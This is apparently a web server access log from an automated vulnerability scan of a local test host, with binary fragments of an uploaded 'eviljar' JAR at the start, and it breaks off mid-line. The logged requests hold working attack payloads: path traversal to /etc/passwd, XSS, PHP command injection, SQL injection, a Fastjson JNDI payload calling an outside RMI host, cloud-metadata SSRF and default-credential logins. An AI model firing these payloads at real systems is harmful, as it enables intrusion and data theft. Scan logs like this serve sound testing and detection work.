\x18\xBE\xF7W4\xBD\x17\xEA\xB6\x83i\x10\xB3\xCB\xB2%:M\xEA\x96]\x09}W1-\x10\xC0\xB6?\x7F\x0C\xD4\xD4D#\xB7\xF7\xF9x?\x9E@\x96c\xD7\xA6=\x18+\x94\x5Cd3Td)H\xAEj!\x9BE\xF6\xB5{\xCB\xE7\xD9\x92&D\x1Bu\x00\xEER\xAF\x96v\x91\xED\x9D\xD3%\xC6\x1D\xEBA\x22\xA6\x19\xDF\x03R\xA6\xC1\xDB\xCD\x1A\xBF\xA0\xC2wI\xD2\xF3\x0B\x96r\xB4\xE2b\x1B\x86\x01\x0D\xCF\xC1\xF0T\x143\xFC\xB3^U\xBEC\xC7r!\xADc\x92\xC3\xD4nEi\x03\xBBR\x9C\xB9\xB0\xE6\xC3\xF1\xE9=\xC5h\xEB\x08\xE6A\x87|\x9D\xD10\x8Ct\xAA\x86\xF6;&A\x03K\xF0\x15\x96D]c\xD4Q\x7F\xD4\xD4\xB7C0\xB2N\xB7@\xF0\x19\x8C\x12f\x9C\xF8e\xDCy\x00z\xD1\x1E\x98!x\x82E\xD1)t\xEA3\xCF\xAB\xCF\xD7m\xF5\xBE\xD9\x11\xDC_\x0F\xF3\xB9k\xF0N\xB0\xF4\x12\x09\x89Wq\xD5i\xD1\x82AV\x1D\x0D\x07:'\xF86q\xD7\xE8\x98i\xC0\xDD0\x9E\x88\xB8\x02\x9E\xEE\x90\x84\xF2\xFF+\xD0?PK\x03\x04\x0A\x00\x00\x00\x08\x00kI'TG\xCF\xAA\xA7s\x00\x00\x00s\x00\x00\x001\x00\x00\x00META-INF/maven/org.example/eviljar/pom.properties\x0D\xC8K\x0A\xC20\x10\x00\xD0\xFD\xC0\xDCa\xA0kK\x92\x8DX\xE8B\x04\x7F\xE0\x07\xD2\x0B\x8CvZ\x225)c\x0Cz{}\xCBW\xED$\x8Ar\x96\x9En_:q\x91\x88Pm5\xD0\x91#\x99%\x99Ucm\xE3\x0Cm|G\xCE8\x87PD_!\xC5\xD6\xD6f\xE1\xCF\xEB\xAB\xDF_:\x84Q\xD3{>\xF4m\xD2\xB1\x96\x0F?\xE7I\x10Xs\x18\xF8\x9E\xFF/%L\x0FV\x84\x1FPK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xEDA\x00\x00\x00\x00META-INF/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xD5J'T\xE6([7j\x00\x00\x00\x81\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81'\x00\x00\x00META-INF/MANIFEST.MFPK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xD6J'Tb\xED\xA9)^\x03\x00\x00\x1C\x06\x00\x00\x0A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81\xC3\x00\x00\x00Evil.classPK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFFI\x04\x00\x00META-INF/maven/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFFv\x04\x00\x00META-INF/maven/org.example/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00#\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFF\xAF\x04\x00\x00META-INF/maven/org.example/eviljar/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xC2H'TR\xFE\xB1L\x16\x01\x00\x00;\x02\x00\x00*\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81\xF0\x04\x00\x00META-INF/maven/org.example/eviljar/pom.xmlPK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00kI'TG\xCF\xAA\xA7s\x00\x00\x00s\x00\x00\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81N\x06\x00\x00META-INF/maven/org.example/eviljar/pom.propertiesPK\x05\x06\x00\x00\x00\x00\x08\x00\x08\x00?\x02\x00\x00\x10\x07\x00\x00\x00\x00\x0D\x0A------WebKitFormBoundaryreButJNjkCniQExX\x0D\x0AContent-Disposition: form-data; name=\x22request\x22; filename=\x22blob\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0Anull\x0D\x0A------WebKitFormBoundaryreButJNjkCniQExX--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /plugin/add HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/pr.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zm/?view=log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///https://example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /omni_success?cmdb_edit_path=\x22);alert('nuclei');// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/sling/loginstatus.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /msa/../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"j_username=weblogic&j_password=weblogic123&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/73 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /provider.tf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cf-scripts/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /time.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"\x0D\x0A\x0D\x0A _CobblerXMLRPCInterface__make_token\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A cobbler\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /new/newhttp://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-resources/restservices/v2/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/metadata/instance?api-version=2021-02-01 HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.569","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"{\x22entry\x22:\x22Evil\x22,\x22request\x22:\x22id\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /plugin/customMethod HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/automerge.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%3C%3E//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///system///sling///loginstatus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ultimate-member/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"j_username=admin&j_password=12345678&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/74 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dms/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/oauth2/..;/ccversion/Version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"loginwith=suslogin&username=webadmin&password=webadmin&submit=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadmin/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=fetch_posts&stream-id=1&hash=%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger_doc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"{\x0D\x0A \x22a\x22:{\x0D\x0A \x22@type\x22:\x22java.lang.Class\x22,\x0D\x0A \x22val\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22\x0D\x0A },\x0D\x0A \x22b\x22:{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca2tuc8smpv1g2s80ca0ka7aemfd87mxr.oast.pro/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mongo-express/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/docker.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5C/%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 